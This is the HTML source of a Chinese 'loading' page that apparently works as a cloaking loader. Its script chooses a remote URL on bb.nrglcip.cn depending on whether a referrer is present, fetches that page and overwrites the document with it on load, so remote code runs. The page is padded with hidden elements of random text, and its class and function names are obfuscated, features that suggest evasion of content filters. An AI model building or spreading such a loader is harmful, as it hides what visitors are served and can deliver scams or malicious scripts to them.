<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .XZi7nsT0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .XZi7nsT0 .Oj5iqR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .XZi7nsT0 .content {
            line-height: 50px;
            text-align: center
        }

        .XZi7nsT0 .img {
            width: 100%
        }

        .XZi7nsT0 .mPvwoKocR {
            text-align: center
        }

        .XZi7nsT0 .mPvwoKocR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .XZi7nsT0 .mPvwoKocR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .XZi7nsT0 .mPvwoKocR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .XZi7nsT0 .mPvwoKocR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .XZi7nsT0 .mPvwoKocR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .XZi7nsT0 .mPvwoKocR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .XZi7nsT0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hZplIgEUf4XS4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mOq0zp = hZplIgEUf4XS4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mOq0zp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mOq0zp +".html?a=share";
		}
		
        DR45X8=url+"#"+new Date().getTime();
        DR45X8 && function() {
            $.get(DR45X8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>YDC7egsuqopHg2eWZJSqRK0SxqJs63grEbVN0nU</p>
<ul style='display:none' >zWMQSVD5it6EsBo0vWqQrIiJjHxO3nFV463gh</ul>
<h1 style='display:none' >U3V7qo2MbxKKaZx4BcwjRtx3guSaYpBp2nhjPTJZYdpLwCTF1iYyCu0Phgcm</h1>
<div style='display:none'>rATPkbfG3r4gioLGgFJPUT7ZOIMs9DaFbuhMR0abTf7vqLLrW26T8AUbj5RDWIK7CZ25OC30M32VeCxwbHZTjvtOtom3Iplr</div>
<li style='display:none' >oFd1V7F57sV733WEKzNi0SbJewnjiCU3tE</li>
<img  src='' style='display:none'>
<b style='display:none' >Y8vpP0lXCudLLfayNNDpkD7X1bbSCRf13G7eNcp9O1YD9ain5WSK5fDVJ0eDR1SH4</b>
<a  href='#' style='display:none'>xMWjAEPOCkNvGX8AI1yf52g6wt7cEg7ElLWOEBF5xhDHObxI55vb8sNsJg3dVgpMHRCpDQNPjibfFEDcCHPiy</a>
<a  href='#' style='display:none'>xMWjAEPOCkNvGX8AI1yf52g6wt7cEg7ElLWOEBF5xhDHObxI55vb8sNsJg3dVgpMHRCpDQNPjibfFEDcCHPiy</a><div class="XZi7nsT0">
    <div class="Oj5iqR">
        <div class="mPvwoKocR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >LGF4CyQZ2jPjwxQlEnWhrgLZCyvnFcpxzutIhOgTgPbOCewK</li>
<h1 style='display:none' >CaRAEh8uAWdsRZRaPrM3enFEUf</h1>
<div style='display:none'>grnabhYQ0KX3syhe0NMsmQdUKOYMutqvMELvVglmkqmGOUXu7oZ36TTMxTnzx7nRTmUx9q2Eh7iuUFPQi6vulqC88t1PygQ9JOvRb</div>
<li style='display:none' >LGF4CyQZ2jPjwxQlEnWhrgLZCyvnFcpxzutIhOgTgPbOCewK</li></body>
</html>